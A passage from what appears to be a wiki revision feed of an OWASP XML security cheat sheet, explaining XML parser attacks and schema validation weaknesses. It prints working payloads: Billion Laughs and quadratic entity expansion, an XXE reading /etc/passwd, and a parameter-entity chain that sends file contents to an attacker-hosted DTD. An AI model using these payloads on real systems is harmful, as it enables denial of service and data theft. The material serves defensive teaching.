Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n2)). The result of the following attack will be 100,000*100,000 characters in memory.&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(a 100.000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(a 100.000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the external entities included within the following code, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE TEST [&lt;br /&gt;
 &amp;lt;!ELEMENT TEST ANY&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TEST&amp;gt;&amp;amp;LOL9;&amp;lt;/TEST&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as the 10 entities defined in &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt;; then each of these entities will be resolved in &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt; and so on. Finally, the CPU and/or memory will be affected by parsing the 3*10^9 (3,000,000,000) entities defined in this schema, which could make the parser crash. &lt;br /&gt;
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message :&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?XML VERSION=&amp;quot;1.0&amp;quot; ENCODING=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE SOAP-ENV:ENVELOPE [ &lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:ENVELOPE ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:ENVELOPE ENTITYREFERENCE CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt; &lt;br /&gt;
&amp;lt;SOAP:ENVELOPE ENTITYREFERENCE=&amp;quot;&amp;amp;LOL9;&amp;quot; XMLNS:SOAP=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;SOAP:BODY&amp;gt; &lt;br /&gt;
    &amp;lt;KEYWORD XMLNS=&amp;quot;URN:PARASOFT:WS:STORE&amp;quot;&amp;gt;FOO&amp;lt;/KEYWORD&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:BODY&amp;gt;&lt;br /&gt;
&amp;lt;/SOAP:ENVELOPE&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT includeme ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY xxe SYSTEM &amp;quot;/etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;xxe;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt;, which is in fact the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;, which will be expanded within the &amp;lt;tt&amp;gt;includeme&amp;lt;/tt&amp;gt; tag. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output. &lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF ) happens when the server receives a malicious XML schema, which makes the server retrieve remote resources such as a file, a file via HTTP/HTTPS/FTP, etc. SSRF has been used to retrieve remote files, to prove a XXE when you cannot reflect back the file or perform port scanning, or perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY %xxe SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt; &lt;br /&gt;
  %xxe;&lt;br /&gt;
]&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allows for the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % file SYSTEM &amp;quot;file:///etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % dtd SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt;&lt;br /&gt;
  %dtd;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;send;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt; which loads a remote DTD. The remote DTD should contain something like this::&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY % all &amp;quot;&amp;lt;!ENTITY send SYSTEM 'http://example.com/?%file;'&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
%all;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL. &lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
The simplest and most unusual scenario, with complete disclosure you can clearly see what’s going on by receiving the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 &amp;lt;pre&amp;gt;java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
	at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the time of response when connected to a valid port will be very quick (one second, for example). The differences between open and closed ports becomes quite clear.   &lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host; then analyze the average time for each port to determinate the status of each port. This type of attack will be difficult to accomplish when performed in higher latency networks.&lt;br /&gt;
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; as part of the URI scheme. For example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;foo://username:password@example.com:8080/&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224434</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224434"/>
				<updated>2016-12-21T20:21:45Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using not well formed documents.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution once detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities are to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
 &amp;lt;!-- one&lt;br /&gt;
  &amp;lt;!-- another comment&lt;br /&gt;
 comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though is not required: &lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coersive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up —and eventually deplete— the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
    ...&lt;br /&gt;
     &amp;lt;A30000&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closed the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to add one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and set the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10.  If the application processes only the first values provided for the id and the value without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1.000.000digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
 &amp;lt;/person&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; is then defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt; as well as the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. After this definition begins the well-formed and valid XML document. The element name contains an irrelevant value but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain amount of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
Provided you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the specific 16 hexadecimal characters. To exemplify this scenario, when using XML encryption  some values must be encoded using base64 . This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/choice&amp;gt;&lt;br /&gt;
  &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and will consider it valid. The first portion of this data is properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions are partially set for the element, which means that the information is probably tested using an application instead of the proposed sample schema. &lt;br /&gt;
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Negative numbers and the zero value&lt;br /&gt;
* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Positive numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
